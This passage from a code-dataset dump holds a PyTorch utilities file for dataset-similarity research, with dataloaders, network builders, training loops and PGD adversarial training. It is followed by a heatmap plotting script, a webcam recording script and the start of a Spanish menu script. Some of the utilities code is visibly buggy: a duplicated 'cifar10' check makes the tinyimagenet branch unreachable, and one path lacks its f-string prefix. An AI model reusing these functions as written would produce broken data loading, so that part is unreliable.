image.to(device)\n label = label.to(device)\n output = net(image)\n _, pred = output.topk(5, 1, largest=True, sorted=True)\n\n label = label.view(label.size(0), -1).expand_as(pred)\n correct = pred.eq(label).float()\n #compute top 5\n correct_5 += correct[:, :5].sum()\n #compute top1\n correct_1 += correct[:, :1].sum()\n\n # print()\n # print(\"Top 1 err: \", 1 - correct_1 / len(test_loader.dataset))\n # print(\"Top 5 err: \", 1 - correct_5 / len(test_loader.dataset))\n # print(\"Parameter numbers: {}\".format(sum(p.numel() for p in net.parameters())))\n return correct_1.item(), correct_5.item()\n\n# model evaluation\ndef compute_accuracy(net, testloader, device):\n '''\n as the name.\n '''\n net.eval()\n pred = []\n true = []\n with torch.no_grad():\n for images, labels in testloader:\n images, labels = images.to(device), labels.to(device)\n pred += net(images).argmax(dim=1).tolist()\n true += labels.tolist()\n return accuracy_score(true, pred), pred, true\n\n### train functions\n#train the model\ndef train_mlp(net, trainloader, testloader, n_epochs, optimizer, criterion, device):\n '''\n used for train meta MLP.\n '''\n for epoch in range(1, n_epochs+1):\n net.train()\n running_loss = 0.\n train_pred = []\n train_true = []\n for i, (inputs, labels) in enumerate(trainloader, 1):\n train_true += labels.tolist()\n inputs, labels = inputs.to(device), labels.to(device)\n optimizer.zero_grad()\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n running_loss += loss.item() * len(labels)\n train_pred += outputs.argmax(dim=1).tolist()\n\n # Print accuracy after every epoch\n accuracy, pred, true = compute_accuracy(net, testloader, device)\n print('Epoch {}. Train loss: {:.2f}. Train acc: {:.2f}. Test acc: {:.2f}.'.format(\n epoch, \n running_loss / len(trainloader.dataset),\n 100 * accuracy_score(train_true, train_pred),\n 100 * accuracy ))\n\n print('Finished Training')\n return accuracy\n\n###########################\n######## END SELF #########\n###########################\n\n\n###########################\n####### BEGIN NEW #########\n###########################\n\nclass SubTrainDataset(Dataset):\n def __init__(self, data, targets, transform=None, target_transform=None):\n self.data = data\n self.targets = targets\n self.transform = transform\n self.target_transform = target_transform\n def __getitem__(self, index):\n img, target = self.data[index], self.targets[index]\n\n # doing this so that it is consistent with all other datasets\n # to return a PIL Image\n # TODO: unify the following line, in case study, the below line does not exist.\n # img = Image.fromarray(img)\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return img, target\n def __len__(self):\n return len(self.data)\n\n# methods for loading sub-datasets of CIFAR-10/100 and Tiny-ImageNet\n\n\ndef get_dataset_hyperparam(dataset):\n if dataset == 'cifar10':\n return settings.CIFAR10_EPOCH, settings.CIFAR10_MILESTONES\n if dataset == 'cifar100':\n return settings.CIFAR100_EPOCH, settings.CIFAR100_MILESTONES\n if dataset == 'tinyimagenet':\n return settings.TINYIMAGENET_EPOCH, settings.TINYIMAGENET_MILESTONES\n\ndef get_dataset_mean_std(dataset):\n if dataset == 'cifar10':\n return settings.CIFAR10_TRAIN_MEAN, settings.CIFAR10_TRAIN_STD\n if dataset == 'cifar100':\n return settings.CIFAR100_TRAIN_MEAN, settings.CIFAR100_TRAIN_STD\n if dataset == 'tinyimagenet':\n return 
settings.TINYIMAGENET_TRAIN_MEAN, settings.TINYIMAGENET_TRAIN_STD\n \ndef get_intersection_mean_std_dict(dataset_name):\n '''\n get normalization mean and std for each intersections 0.0, 0.1, ..., 0.9, 1.0. used for evaluation.\n '''\n mean_std_dict = {}\n for s in (np.arange(11) / 10):\n Set1, Set2 = pickle.load(open(os.path.join(settings.DATA_PATH, f'similarity/{dataset_name.upper()}_intersect_{s}.pkl'), 'rb'))\n mean = tuple((Set2[0] / 255).mean(axis=(0, 1, 2)))\n std = tuple((Set2[0] / 255).std(axis=(0, 1, 2)))\n mean_std_dict['int{}'.format(s)] = (mean, std)\n mean_std_dict['vic'] = mean_std_dict['int1.0']\n return mean_std_dict\n\ndef get_subtraining_dataloader_cifar10_intersect(propor=0.5, batch_size=16, num_workers=8, shuffle=True, sub_idx=1):\n\n \n X_set, y_set = pickle.load(open(os.path.join(settings.DATA_PATH, f'similarity/CIFAR10_intersect_{propor}.pkl'), 'rb'))[sub_idx]\n mean = tuple((X_set / 255).mean(axis=(0, 1, 2)))\n std = tuple((X_set / 255).std(axis=(0, 1, 2)))\n \n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar10_training = SubTrainDataset(X_set, list(y_set), transform=transform_train)\n cifar10_training_loader = DataLoader(\n cifar10_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return cifar10_training_loader, mean, std\n\ndef get_subtraining_dataloader_cifar100_intersect(propor=0.5, batch_size=16, num_workers=8, shuffle=True, sub_idx=1):\n\n \n X_set, y_set = pickle.load(open(os.path.join(settings.DATA_PATH, f'similarity/CIFAR100_intersect_{propor}.pkl'), 'rb'))[sub_idx]\n mean = tuple((X_set / 255).mean(axis=(0, 1, 2)))\n std = tuple((X_set / 255).std(axis=(0, 1, 2)))\n \n \n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar100_training = SubTrainDataset(X_set, list(y_set), transform=transform_train)\n cifar100_training_loader = DataLoader(\n cifar100_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return cifar100_training_loader, mean, std\n\ndef get_subtraining_dataloader_tinyimagenet_intersect(propor=0.5, batch_size=16, num_workers=8, shuffle=True, sub_idx=1):\n\n X_set, y_set = pickle.load(open(os.path.join(settings.DATA_PATH, 'similarity/TINYIMAGENET_intersect_{propor}.pkl'), 'rb'))[sub_idx]\n mean = tuple((X_set / 255).mean(axis=(0, 1, 2)))\n std = tuple((X_set / 255).std(axis=(0, 1, 2)))\n \n \n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(64, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n tinyimagenet_training = SubTrainDataset(X_set, list(y_set), transform=transform_train)\n tinyimagenet_training_loader = DataLoader(\n tinyimagenet_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return tinyimagenet_training_loader, mean, std\n\ndef get_intersect_dataloader(dataset, propor, batch_size=16, num_workers=8, shuffle=True, sub_idx=1):\n if dataset == 'cifar10':\n return get_subtraining_dataloader_cifar10_intersect(propor=propor, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, sub_idx=sub_idx)\n elif dataset == 
'cifar100':\n return get_subtraining_dataloader_cifar100_intersect(propor=propor, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, sub_idx=sub_idx)\n elif dataset == 'tinyimagenet':\n return get_subtraining_dataloader_tinyimagenet_intersect(propor=propor, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, sub_idx=sub_idx)\n\n\n\n\ndef get_training_dataloader_cifar10(mean, std, batch_size=16, num_workers=8, shuffle=True):\n\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar10_training = torchvision.datasets.CIFAR10(root=os.path.join(settings.DATA_PATH, 'CIFAR10'), train=True, download=True, transform=transform_train)\n cifar10_training_loader = DataLoader(\n cifar10_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return cifar10_training_loader\n\ndef get_training_dataloader_cifar100(mean, std, batch_size=16, num_workers=8, shuffle=True):\n \"\"\" return training dataloader\n Args:\n mean: mean of cifar100 training dataset\n std: std of cifar100 training dataset\n path: path to cifar100 training python dataset\n batch_size: dataloader batchsize\n num_workers: dataloader num_works\n shuffle: whether to shuffle\n Returns: train_data_loader:torch dataloader object\n \"\"\"\n\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar100_training = torchvision.datasets.CIFAR100(root=os.path.join(settings.DATA_PATH, 'CIFAR100'), train=True, download=True, transform=transform_train)\n cifar100_training_loader = DataLoader(\n cifar100_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return cifar100_training_loader\n\ndef get_training_dataloader_tinyimagenet(mean, std, batch_size=16, num_workers=8, shuffle=True):\n\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(64, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n tinyimagenet_training = datasets.ImageFolder(os.path.join(settings.DATA_PATH, 'tiny-imagenet-200/train/'), transform=transform_train)\n tinyimagenet_training_loader = DataLoader(\n tinyimagenet_training, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size)\n\n return tinyimagenet_training_loader\n\ndef get_training_dataloader(dataset, mean, std, batch_size=16, num_workers=8, shuffle=True):\n if dataset == 'cifar10':\n return get_training_dataloader_cifar10(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle)\n if dataset == 'cifar100':\n return get_training_dataloader_cifar100(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle)\n if dataset == 'cifar10':\n return get_training_dataloader_tinyimagenet(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle)\n\n\n\n\ndef get_test_dataloader_cifar10(mean, std, batch_size=16, num_workers=8, shuffle=False, pin_memory=True):\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar10_test = torchvision.datasets.CIFAR10(root=os.path.join(settings.DATA_PATH, 'CIFAR10'), 
train=False, download=True, transform=transform_test)\n cifar10_test_loader = DataLoader(\n cifar10_test, shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory, batch_size=batch_size)\n\n return cifar10_test_loader\n\ndef get_test_dataloader_cifar100(mean, std, batch_size=16, num_workers=8, shuffle=True, pin_memory=True):\n \"\"\" return training dataloader\n Args:\n mean: mean of cifar100 test dataset\n std: std of cifar100 test dataset\n path: path to cifar100 test python dataset\n batch_size: dataloader batchsize\n num_workers: dataloader num_works\n shuffle: whether to shuffle\n Returns: cifar100_test_loader:torch dataloader object\n \"\"\"\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n cifar100_test = torchvision.datasets.CIFAR100(root=os.path.join(settings.DATA_PATH, 'CIFAR100'), train=False, download=True, transform=transform_test)\n cifar100_test_loader = DataLoader(\n cifar100_test, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size, pin_memory=pin_memory)\n\n return cifar100_test_loader\n\ndef get_test_dataloader_tinyimagenet(mean, std, batch_size=16, num_workers=8, shuffle=True, pin_memory=True):\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n X_set, y_set = pickle.load(open(os.path.join(settings.DATA_PATH, 'TinyImagenet_test.pkl'), 'rb'))\n tinyimagenet_test = SubTrainDataset(X_set, list(y_set), transform=transform_test)\n tinyimagenet_test_loader = DataLoader(\n tinyimagenet_test, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size, pin_memory=pin_memory)\n return tinyimagenet_test_loader\n\ndef get_test_dataloader(dataset, mean, std, batch_size=16, num_workers=8, shuffle=True, pin_memory=True):\n if dataset == 'cifar10':\n return get_test_dataloader_cifar10(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, pin_memory=pin_memory)\n elif dataset == 'cifar100':\n return get_test_dataloader_cifar100(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, pin_memory=pin_memory)\n if dataset == 'tinyimagenet':\n return get_test_dataloader_tinyimagenet(mean=mean, std=std, batch_size=batch_size, num_workers=num_workers, shuffle=shuffle, pin_memory=pin_memory)\n\n######################################################################################\n# methods for loading sub-datasets for case-study of facial attribute classification.#\n######################################################################################\ndef get_subtraining_dataloader_facial_intersect(propor=0.6, batch_size=16, num_workers=8, shuffle=True):\n\n X_tensor, y_tensor = pickle.load(open(os.path.join(settings.DATA_PATH, 'facial_attribute', 'fairface_similarity', f'intersect_{propor}.pkl'), 'rb'))\n mean = X_tensor.mean(dim=[0, 2, 3])\n std = X_tensor.std(dim=[0, 2, 3])\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(128, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n # transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n tinyimagenet_training = SubTrainDataset(X_tensor, list(y_tensor), transform=transform_train)\n tinyimagenet_training_loader = DataLoader(\n tinyimagenet_training, shuffle=shuffle, \n num_workers=num_workers, batch_size=batch_size, pin_memory=True)\n\n return tinyimagenet_training_loader, mean, std, len(torch.unique(y_tensor))\n\ndef get_subtraining_dataloader_facial_mix(propor=0.6, 
batch_size=16, num_workers=8, shuffle=True):\n\n X_tensor, y_tensor = pickle.load(open(os.path.join(settings.DATA_PATH, 'facial_attribute', 'fairface_utk_mix', f'/intersect_{propor}.pkl'), 'rb'))\n mean = X_tensor.mean(dim=[0, 2, 3])\n std = X_tensor.std(dim=[0, 2, 3])\n transform_train = transforms.Compose([\n #transforms.ToPILImage(),\n transforms.RandomCrop(128, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n # transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n tinyimagenet_training = SubTrainDataset(X_tensor, list(y_tensor), transform=transform_train)\n tinyimagenet_training_loader = DataLoader(\n tinyimagenet_training, shuffle=shuffle, \n num_workers=num_workers, batch_size=batch_size, pin_memory=True)\n\n return tinyimagenet_training_loader, mean, std, len(torch.unique(y_tensor))\n\n\ndef get_facial_dataloader(inter_propor=0.6, batch_size=16, num_workers=8, shuffle=True, same_data_dist=True, adaptive_trans=\"gauss_color\", dst_ratio=1, seed=None):\n ''' \n same_data_dist means adversary data is of same distribution as the victim data, diff means the adversary data is of the different distribution.\n adaptve is a list, test for adaptive attacks\n '''\n X_tensor_list, y_tensor_list = [], []\n fair_train_img_set_tensor, fair_train_label_set = pickle.load(open(os.path.join(settings.DATA_PATH, \"facial_attribute\", \"fairface_set1_tensor.pkl\"), \"rb\"))\n # we first shrink the dataset (reduce the dataset size if dst_ratio is other than 1)\n fair_train_img_set_tensor = fair_train_img_set_tensor[::dst_ratio]\n fair_train_label_set = fair_train_label_set[::dst_ratio]\n set_num = len(fair_train_img_set_tensor)\n shift = int(inter_propor * set_num)\n\n print(f\"Sample id {set_num - shift} to id {set_num} from set1.\")\n X_tensor_list.append(fair_train_img_set_tensor[set_num - shift:])\n y_tensor_list.append(fair_train_label_set[set_num - shift:])\n \n\n if same_data_dist:\n print(\"The adversary has data of same distribution: sampling from FairFace data as the adversary data.\")\n fair_train_img_set_tensor_unrelated, fair_train_label_set_unrelated = pickle.load(open(os.path.join(settings.DATA_PATH, \"facial_attribute\", \"fairface_set_rest_tensor.pkl\"), \"rb\"))\n if seed is not None:\n # random sampling from unrelated data of same distribution\n np.random.seed(seed)\n idx = np.random.permutation(len(fair_train_img_set_tensor_unrelated))[:set_num - shift]\n # Here, the set_num is based on (shrinked, if dst_ratio != 1) dataset size, so we only randomly select the equal number of samples from unrelated data pool.\n X_tensor_list.append(fair_train_img_set_tensor_unrelated[idx])\n y_tensor_list.append(fair_train_label_set_unrelated[idx])\n else:\n X_tensor_list.append(fair_train_img_set_tensor_unrelated[::dst_ratio][:set_num - shift])\n y_tensor_list.append(fair_train_label_set_unrelated[::dst_ratio][:set_num - shift])\n else:\n print(\"The adversary has data of different distribution: sampling from UTK data as the adversary data.\")\n utk_train_img_set_tensor, utk_train_label_set = pickle.load(open(os.path.join(settings.DATA_PATH, \"facial_attribute\", \"utk_tensor.pkl\"), \"rb\"))\n X_tensor_list.append(utk_train_img_set_tensor[::dst_ratio][:set_num - shift])\n y_tensor_list.append(utk_train_label_set[::dst_ratio][:set_num - shift])\n \n print(f\"0 to {set_num - shift} from set2\")\n X_tensor, y_tensor = torch.cat(X_tensor_list), torch.cat(y_tensor_list)\n\n if not same_data_dist: # in this case, the adversary trains the model and can shift 
data's visual features by transformations.\n trans_list = []\n if 'gauss' in adaptive_trans:\n trans_list.append(transforms.GaussianBlur(kernel_size=15))\n if 'color' in adaptive_trans:\n trans_list.append(transforms.ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.2))\n if len(trans_list) > 0:\n trans = transforms.Compose(trans_list)\n torch.manual_seed(seed)\n for i in tqdm(range(len(X_tensor))):\n X_tensor[i] = trans(X_tensor[i])\n\n mean, std = X_tensor.mean(dim=[0, 2, 3]), X_tensor.std(dim=[0, 2, 3])\n transform_train = transforms.Compose([\n transforms.RandomCrop(128, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.Normalize(mean, std)])\n tinyimagenet_training = SubTrainDataset(X_tensor, list(y_tensor), transform=transform_train)\n tinyimagenet_training_loader = torch.utils.data.DataLoader(\n tinyimagenet_training, shuffle=shuffle, \n num_workers=num_workers, batch_size=batch_size, pin_memory=True)\n\n return tinyimagenet_training_loader, mean, std, len(torch.unique(y_tensor))\n\n\n\ndef get_test_dataloader_facial(mean, std, batch_size=16, num_workers=8, shuffle=True, pin_memory=True):\n transform_test = transforms.Compose([\n # transforms.ToTensor(),\n transforms.Normalize(mean, std)\n ])\n X_tensor, y_tensor = pickle.load(open(os.path.join(settings.DATA_PATH, 'facial_attribute', 'fairface_val_tensor.pkl'), 'rb'))\n tinyimagenet_test = SubTrainDataset(X_tensor, y_tensor, transform=transform_test)\n tinyimagenet_test_loader = DataLoader(\n tinyimagenet_test, shuffle=shuffle, num_workers=num_workers, batch_size=batch_size, pin_memory=pin_memory)\n return tinyimagenet_test_loader\n\n\n\n\n\n###########################\n##### Load Networks #######\n###########################\n\ndef get_num_classes(dataset):\n if dataset == 'cifar10':\n return 10\n if dataset == 'cifar100':\n return 100\n if dataset == 'tinyimagenet':\n return 200\n\ndef get_network_cifar(netname, gpu, num_classes):\n \"\"\" return given network, architectures are based on kangliu's training code.\n check https://github.com/kuangliu/pytorch-cifar.\n \"\"\"\n if netname == 'vgg16':\n from models.vgg import vgg16_bn\n net = vgg16_bn(num_classes=num_classes)\n elif netname == 'vgg13':\n from models.vgg import vgg13_bn\n net = vgg13_bn(num_classes=num_classes)\n elif netname == 'vgg11':\n from models.vgg import vgg11_bn\n net = vgg11_bn(num_classes=num_classes)\n elif netname == 'vgg19':\n from models.vgg import vgg19_bn\n net = vgg19_bn(num_classes=num_classes)\n elif netname == 'densenet121':\n from models.densenet import densenet121\n net = densenet121(num_classes=num_classes)\n elif netname == 'densenet161':\n from models.densenet import densenet161\n net = densenet161(num_classes=num_classes)\n elif netname == 'densenet169':\n from models.densenet import densenet169\n net = densenet169(num_classes=num_classes)\n elif netname == 'densenet201':\n from models.densenet import densenet201\n net = densenet201(num_classes=num_classes)\n elif netname == 'resnet18':\n from models.resnet import resnet18\n net = resnet18(num_classes=num_classes)\n elif netname == 'resnet34':\n from models.resnet import resnet34\n net = resnet34(num_classes=num_classes)\n elif netname == 'resnet50':\n from models.resnet import resnet50\n net = resnet50(num_classes=num_classes)\n elif netname == 'resnet101':\n from models.resnet import resnet101\n net = resnet101(num_classes=num_classes)\n else:\n print('the network name you have entered is not supported yet')\n sys.exit()\n\n if gpu: 
#use_gpu\n net = net.cuda()\n\n return net\n\ndef get_network_torchvision(netname, gpu, num_classes):\n if netname == 'wideresnet101':\n from torchvision.models import wide_resnet101_2\n net = wide_resnet101_2(num_classes=num_classes)\n elif netname == 'densenet121':\n from torchvision.models import densenet121\n net = densenet121(num_classes=num_classes)\n elif netname == 'resnet152':\n from torchvision.models import resnet152\n net = resnet152(num_classes=num_classes)\n elif netname == 'resnet101':\n from torchvision.models import resnet101\n net = resnet101(num_classes=num_classes)\n elif netname == 'vgg19':\n from torchvision.models import vgg19_bn\n net = vgg19_bn(num_classes=num_classes)\n elif netname == 'mobilenet_v2':\n from torchvision.models import mobilenet_v2\n net = mobilenet_v2(num_classes=num_classes)\n elif netname == 'wide_resnet101_2':\n from torchvision.models import wide_resnet101_2\n net = wide_resnet101_2(num_classes=num_classes)\n \n else:\n print('the network name you have entered is not supported yet')\n sys.exit()\n\n if gpu: #use_gpu\n net = net.cuda()\n\n return net\n\ndef get_network(dataset, netname, gpu):\n num_classes = get_num_classes(dataset)\n if dataset.startswith('cifar'):\n return get_network_cifar(netname, gpu, num_classes)\n elif dataset == 'tinyimagenet':\n return get_network_torchvision(netname, gpu, num_classes)\n\n\n###########################\n####### Training ##########\n###########################\n\n\n\n\n\nclass WarmUpLR(_LRScheduler):\n \"\"\"warmup_training learning rate scheduler\n Args:\n optimizer: optimzier(e.g. SGD)\n total_iters: totoal_iters of warmup phase\n \"\"\"\n def __init__(self, optimizer, total_iters, last_epoch=-1):\n\n self.total_iters = total_iters\n super().__init__(optimizer, last_epoch)\n\n def get_lr(self):\n \"\"\"we will use the first m batches, and set the learning\n rate to base_lr * m / total_iters\n \"\"\"\n return [base_lr * self.last_epoch / (self.total_iters + 1e-8) for base_lr in self.base_lrs]\n\n\n\n##For adversarial training####\n\ndef PGD(x, loss_fn, y=None, model=None, eps=None, steps=3, gamma=None):\n\n # convert to cuda...\n x_adv = x.clone().cuda()\n # create an adv. example w. 
random init\n x_rand = torch.rand(x_adv.shape).cuda()\n x_adv += (2.0 * x_rand - 1.0) * eps\n x_adv.requires_grad_(True)\n # run steps\n for t in range(steps):\n out_adv_branch = model(x_adv) # use the main branch\n loss_adv = loss_fn(out_adv_branch, y)\n grad = torch.autograd.grad(loss_adv, x_adv, only_inputs=True)[0]\n\n x_adv.data.add_(gamma * torch.sign(grad.data))\n _linfball_projection(x, eps, x_adv, in_place=True)\n\n x_adv = torch.clamp(x_adv, 0, 1)\n return x_adv\n\ndef _linfball_projection(center, radius, t, in_place=True):\n min_range = center - radius\n max_range = center + radius\n if not in_place:\n res = t.clone()\n else:\n res = t\n idx = res.data < min_range\n res.data[idx] = min_range[idx]\n idx = res.data > max_range\n res.data[idx] = max_range[idx]\n return res\n\n\n\ndef train(epoch, net, training_loader, loss_function, optimizer, warmup_epoch=0, warmup_scheduler=None, adv_training=False, verbose=False):\n start = time.time()\n net.train()\n loss_epoch = 0\n correct = 0.0\n for batch_index, (images, labels) in enumerate(training_loader):\n labels, images = labels.cuda(), images.cuda()\n optimizer.zero_grad()\n outputs = net(images)\n loss = loss_function(outputs, labels)\n if adv_training and (np.random.rand() > 0.9):\n b_advx = PGD(images, loss_function, y=labels, model=net, eps=128/255., steps=1, gamma=1/255.).data.cuda()\n loss += loss_function(net(b_advx), labels)\n loss_epoch += loss.item() * len(labels)\n correct += outputs.argmax(dim=1).eq(labels).sum().item()\n loss.backward()\n optimizer.step()\n\n if epoch <= warmup_epoch and warmup_scheduler is not None:\n warmup_scheduler.step()\n if verbose:\n print(f\"Training Epoch: {epoch} [{batch_index * training_loader.batch_size + len(images)}/{len(training_loader.dataset)}]\\tLoss: \\\n {loss.item():0.4f}\\tLR: {optimizer.param_groups[0]['lr']:0.6f}\")\n finish = time.time()\n if verbose:\n print(f'Epoch {epoch} training time consumed: {finish - start:.2f}s')\n return loss_epoch / len(training_loader.dataset), correct / len(training_loader.dataset)\n\n\n\n\n\n@torch.no_grad()\ndef eval_training(epoch, net, test_loader, loss_function, verbose=False):\n start = time.time()\n net.eval()\n\n test_loss = 0.0 # cost function error\n correct = 0.0\n\n for (images, labels) in test_loader:\n images = images.cuda()\n labels = labels.cuda()\n\n outputs = net(images)\n loss = loss_function(outputs, labels)\n\n test_loss += loss.item()\n _, preds = outputs.max(1)\n correct += preds.eq(labels).sum()\n\n finish = time.time()\n if verbose:\n print(f'Test set: Epoch: {epoch}, Average loss: {test_loss / len(test_loader.dataset):.4f}, Accuracy: {correct.float() / len(test_loader.dataset):.4f}, Time consumed:{finish - start:.2f}s')\n return correct.float() / len(test_loader.dataset)\n\n\n","repo_name":"chichidd/RAI2","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":30747,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"22689616709","text":"import os\nimport numpy as np\nfrom posixpath import split\nimport sys\n\nfrom matplotlib.colors import LogNorm\nfrom matplotlib.colors import Normalize\nimport matplotlib.pyplot as plt\n\nclass MidpointNormalize(Normalize):\n\n def __init__(self, vmin=None, vmax=None, midpoint=None, clip=False):\n self.midpoint = midpoint\n Normalize.__init__(self, vmin, vmax, clip)\n\n def __call__(self, value, clip=None):\n x, y = [self.vmin, self.midpoint, self.vmax], [0, 0.5, 1]\n return 
np.ma.masked_array(np.interp(value, x, y))\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print(\"No file specified\")\n exit()\n\n log = False\n if len(sys.argv) == 3:\n if sys.argv[2] == \"log\":\n log = True\n\n filename = sys.argv[1]\n\n\n if not os.path.isfile(filename):\n print(\"File\", filename, \"does not exist\")\n exit()\n\n accuracy = []\n gamma = []\n C_val = []\n with(open(filename, 'r')) as f:\n lines = f.readlines()\n\n for l in lines:\n markers = l.split(\" \")\n\n g, c, acc = (x.split(\":\")[1] for x in markers[:3])\n accuracy.append(float(acc))\n gamma.append(float(g))\n C_val.append(float(c))\n\n\n x = list(set(gamma))\n y = list(set(C_val))\n\n x.sort()\n y.sort()\n\n accuracy = np.array(accuracy).reshape((len(x), len(y)))\n accuracy = np.rot90(accuracy, 1)\n #print(accuracy)\n\n plt.imshow(accuracy, cmap='hot', interpolation='nearest', \n extent=[min(x), max(x), min(y), max(y)], aspect='auto',\n norm=MidpointNormalize(vmin=0.986, midpoint=0.99))\n\n plt.xlabel(\"Gamma\")\n plt.ylabel(\"C\")\n\n plt.locator_params(axis='x', nbins=len(x))\n plt.locator_params(axis='y', nbins=len(y))\n\n if log:\n plt.xticks(np.arange(1, 11, step=10/len(x)), x)\n plt.yticks(np.arange(1, 11, step=10/len(y)), y)\n\n #plt.xlim(min(x), max(x))\n #plt.xscale('log')\n #plt.yscale('log')\n # plt.xticks(x)\n\n #plt.yticks(y)\n #plt.ylim(min(y), max(y))\n\n plt.colorbar()\n plt.show()","repo_name":"hellvetica42/FRST_HOG_SVM","sub_path":"logs/plotData.py","file_name":"plotData.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3295628470","text":"import cv2\r\n#####################Basic program\r\n\"\"\"\r\n###set the vediocapture\r\nimg=cv2.VideoCapture(0)\r\n\r\n#read the image that captured by the web cam\r\ncheck,frame=img.read()\r\n\r\n#check gives it is working fine or not\r\nprint(check)\r\n\r\n#show the image\r\ncv2.imshow(\"the\",frame)\r\ncv2.waitKey()\r\nprint(frame.shape)\r\n\r\n#relese the image that will turn off the web camera\r\nimg.release()\r\ncv2.destroyAllWindows()\r\nprint(check)\r\n\"\"\"\r\n#############more advanced capturing the vedio and write it in divice\r\nimg=cv2.VideoCapture(0)\r\nfourcc_code=cv2.VideoWriter_fourcc(*\"XVID\")\r\nvedio=cv2.VideoWriter(\"my_vedio.mp4\",fourcc_code,30,(640,480))\r\ncount=0\r\n#loop for continues capture\r\nwhile(True):\r\n count+=1\r\n check,frame=img.read()\r\n\r\n print(frame.shape)\r\n cv2.imshow(\"thefirtvedio\",frame)\r\n\r\n cv2.imwrite(\"img\"+str(count)+\".jpg\",frame)\r\n vedio.write(frame)\r\n if cv2.waitKey(1)==ord('a'):\r\n break\r\n\r\nvedio.release()\r\ncv2.destroyAllWindows()","repo_name":"pavi-ninjaac/OpenCV","sub_path":"readWrite_webCam.py","file_name":"readWrite_webCam.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37034367050","text":"#Thats a putisima idisima de holla\r\n\r\nimport random\r\nimport os\r\nimport sys\r\nimport time\r\nimport pyautogui\r\n\r\nversion = 0.1\r\nos.system('color 0d')\r\nos.system(\"cls\")\r\nmenu = \"\"\"\r\n************************\r\n\t\tWELCOME\r\n************************\r\n[Juego]\r\n[Trabajo]\r\n[Ideas]\r\n\"\"\"\r\n\r\ndef sistema(): \r\n\tpeticion = input(\"¿Que quieres aser? 
